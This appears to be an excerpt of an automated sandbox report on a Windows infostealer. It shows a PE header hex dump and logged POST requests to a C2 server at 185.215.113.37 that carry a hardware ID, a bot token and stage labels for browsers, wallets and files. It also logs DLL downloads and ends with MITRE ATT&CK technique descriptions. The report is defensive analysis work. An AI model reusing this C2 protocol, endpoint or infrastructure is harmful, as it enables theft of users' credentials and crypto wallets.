00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGHJKJKKJDHIDHJKJDBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 44 38 31 31 32 43 34 42 39 33 33 31 35 38 38 32 31 30 39 39 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 2d 2d 0d 0a Data Ascii: ------AEGHJKJKKJDHIDHJKJDBContent-Disposition: form-data; name="hwid"AED8112C4B933158821099------AEGHJKJKKJDHIDHJKJDBContent-Disposition: form-data; name="build"save------AEGHJKJKKJDHIDHJKJDB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIDAFCGIEHIEBFCFBAHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 65 35 35 64 34 64 37 37 35 66 32 64 62 33 64 33 35 62 63 35 32 65 35 31 31 38 30 62 33 62 65 35 30 34 32 63 33 66 66 66 34 62 64 31 31 62 62 66 63 66 65 64 64 38 63 32 39 61 32 31 38 61 39 34 38 66 34 66 37 64 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 2d 2d 0d 0a Data Ascii: ------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="token"57e55d4d775f2db3d35bc52e51180b3be5042c3fff4bd11bbfcfedd8c29a218a948f4f7d------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="message"browsers------DGHIDAFCGIEHIEBFCFBA--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKFHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 65 35 35 64 34 64 37 37 35 66 32 64 62 33 64 33 35 62 63 35 32 65 35 31 31 38 30 62 33 62 65 35 30 34 32 63 33 66 66 66 34 62 64 31 31 62 62 66 63 66 65 64 64 38 63 32 39 61 32 31 38 61 39 34 38 66 34 66 37 64 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 2d 2d 0d 0a Data Ascii: ------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="token"57e55d4d775f2db3d35bc52e51180b3be5042c3fff4bd11bbfcfedd8c29a218a948f4f7d------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="message"plugins------FBKFCFBFIDGCGDHJDBKF--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAECFCAAECBGDGDHIEHJHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 65 35 35 64 34 64 37 37 35 66 32 64 62 33 64 33 35 62 63 35 32 65 35 31 31 38 30 62 33 62 65 35 30 34 32 63 33 66 66 66 34 62 64 31 31 62 62 66 63 66 65 64 64 38 63 32 39 61 32 31 38 61 39 34 38 66 34 66 37 64 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 2d 2d 0d 0a Data Ascii: ------BAECFCAAECBGDGDHIEHJContent-Disposition: form-data; name="token"57e55d4d775f2db3d35bc52e51180b3be5042c3fff4bd11bbfcfedd8c29a218a948f4f7d------BAECFCAAECBGDGDHIEHJContent-Disposition: form-data; name="message"fplugins------BAECFCAAECBGDGDHIEHJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBAKKJDBKJJJKFHDAEBHost: 185.215.113.37Content-Length: 6183Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEGIDGDGHCAAAAKKFCGHost: 185.215.113.37Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIIEGIDHCBFIDHJDGDBHost: 185.215.113.37Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCGHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 65 35 35 64 34 64 37 37 35 66 32 64 62 33 64 33 35 62 63 35 32 65 35 31 31 38 30 62 33 62 65 35 30 34 32 63 33 66 66 66 34 62 64 31 31 62 62 66 63 66 65 64 64 38 63 32 39 61 32 31 38 61 39 34 38 66 34 66 37 64 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d 0a Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="token"57e55d4d775f2db3d35bc52e51180b3be5042c3fff4bd11bbfcfedd8c29a218a948f4f7d------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="file"------HDGCFHIDAKECFHIEBFCG--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIIIDGHJEBFBGDHDGIIHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 49 49 44 47 48 4a 45 42 46 42 47 44 48 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 65 35 35 64 34 64 37 37 35 66 32 64 62 33 64 33 35 62 63 35 32 65 35 31 31 38 30 62 33 62 65 35 30 34 32 63 33 66 66 66 34 62 64 31 31 62 62 66 63 66 65 64 64 38 63 32 39 61 32 31 38 61 39 34 38 66 34 66 37 64 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 44 47 48 4a 45 42 46 42 47 44 48 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 44 47 48 4a 45 42 46 42 47 44 48 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 44 47 48 4a 45 42 46 42 47 44 48 44 47 49 49 2d 2d 0d 0a Data Ascii: ------FIIIIDGHJEBFBGDHDGIIContent-Disposition: form-data; name="token"57e55d4d775f2db3d35bc52e51180b3be5042c3fff4bd11bbfcfedd8c29a218a948f4f7d------FIIIIDGHJEBFBGDHDGIIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FIIIIDGHJEBFBGDHDGIIContent-Disposition: form-data; name="file"------FIIIIDGHJEBFBGDHDGII--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFIEHCFIECBGCBFHIJJHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDBHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 65 35 35 64 34 64 37 37 35 66 32 64 62 33 64 33 35 62 63 35 32 65 35 31 31 38 30 62 33 62 65 35 30 34 32 63 33 66 66 66 34 62 64 31 31 62 62 66 63 66 65 64 64 38 63 32 39 61 32 31 38 61 39 34 38 66 34 66 37 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 2d 2d 0d 0a Data Ascii: ------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="token"57e55d4d775f2db3d35bc52e51180b3be5042c3fff4bd11bbfcfedd8c29a218a948f4f7d------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="message"wallets------KJJJKFIIIJJJECAAEHDB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHDAEBGCAAFIDGCGDHIHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 65 35 35 64 34 64 37 37 35 66 32 64 62 33 64 33 35 62 63 35 32 65 35 31 31 38 30 62 33 62 65 35 30 34 32 63 33 66 66 66 34 62 64 31 31 62 62 66 63 66 65 64 64 38 63 32 39 61 32 31 38 61 39 34 38 66 34 66 37 64 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 2d 2d 0d 0a Data Ascii: ------GDHDAEBGCAAFIDGCGDHIContent-Disposition: form-data; name="token"57e55d4d775f2db3d35bc52e51180b3be5042c3fff4bd11bbfcfedd8c29a218a948f4f7d------GDHDAEBGCAAFIDGCGDHIContent-Disposition: form-data; name="message"files------GDHDAEBGCAAFIDGCGDHI--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCFHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 65 35 35 64 34 64 37 37 35 66 32 64 62 33 64 33 35 62 63 35 32 65 35 31 31 38 30 62 33 62 65 35 30 34 32 63 33 66 66 66 34 62 64 31 31 62 62 66 63 66 65 64 64 38 63 32 39 61 32 31 38 61 39 34 38 66 34 66 37 64 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 2d 2d 0d 0a Data Ascii: ------BGDGHJEHJJDAAAKEBGCFContent-Disposition: form-data; name="token"57e55d4d775f2db3d35bc52e51180b3be5042c3fff4bd11bbfcfedd8c29a218a948f4f7d------BGDGHJEHJJDAAAKEBGCFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BGDGHJEHJJDAAAKEBGCFContent-Disposition: form-data; name="file"------BGDGHJEHJJDAAAKEBGCF--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIDAFCGIEHIEBFCFBAHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 65 35 35 64 34 64 37 37 35 66 32 64 62 33 64 33 35 62 63 35 32 65 35 31 31 38 30 62 33 62 65 35 30 34 32 63 33 66 66 66 34 62 64 31 31 62 62 66 63 66 65 64 64 38 63 32 39 61 32 31 38 61 39 34 38 66 34 66 37 64 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 2d 2d 0d 0a Data Ascii: ------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="token"57e55d4d775f2db3d35bc52e51180b3be5042c3fff4bd11bbfcfedd8c29a218a948f4f7d------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="message"ybncbhylepme------DGHIDAFCGIEHIEBFCFBA--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKFHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 65 35 35 64 34 64 37 37 35 66 32 64 62 33 64 33 35 62 63 35 32 65 35 31 31 38 30 62 33 62 65 35 30 34 32 63 33 66 66 66 34 62 64 31 31 62 62 66 63 66 65 64 64 38 63 32 39 61 32 31 38 61 39 34 38 66 34 66 37 64 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 2d 2d 0d 0a Data Ascii: ------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="token"57e55d4d775f2db3d35bc52e51180b3be5042c3fff4bd11bbfcfedd8c29a218a948f4f7d------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="message"wkkjqaiaxkhb------FBKFCFBFIDGCGDHJDBKF--

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
